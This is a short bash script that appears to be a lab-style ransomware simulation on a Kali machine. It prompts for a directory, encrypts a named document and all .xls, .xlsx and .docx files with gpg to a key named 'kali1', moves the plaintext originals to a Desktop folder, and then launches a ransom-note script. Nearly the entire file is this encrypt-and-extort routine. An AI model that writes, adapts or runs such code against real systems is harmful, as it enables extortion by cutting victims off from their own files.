#!/bin/bash

# Requires gpg key: https://docs.github.com/en/authentication/managing-commit-signature-verification/generating-a-new-gpg-key, syntax "gpg -r <RECIPIENT>"

# Choose directory to encrypt as $target
read -p "Enter target directory: " target
#encrypt a specific file with filename
gpg -r kali1 --encrypt-files $(ls $target/Important-Document)
#encrypt all .xls files, with 'exception'
gpg -r kali1 --encrypt-file $(ls $target/*.xls | egrep -v 'loader') 
#encrypt all .xlsx files
gpg -r kali1 --encrypt-file $(ls $target/*.xlsx) 
#encrypt all .docx files
gpg -r kali1 --encrypt-file $(ls $target/*.docx) 

#move unencrypted files to desired location
targetfiles=$target/Important-Document
mv $targetfiles '/home/kali/Desktop/Unencrypted Files'

targetfiles=$target/*.xls
mv $targetfiles '/home/kali/Desktop/Unencrypted Files'

targetfiles=$target/*.xlsx
mv $targetfiles '/home/kali/Desktop/Unencrypted Files'

targetfiles=$target/*.docx
mv $targetfiles '/home/kali/Desktop/Unencrypted Files'

#show burger ransom note
NOTE="/home/kali/Desktop/Opening_Page"
sh "$NOTE"
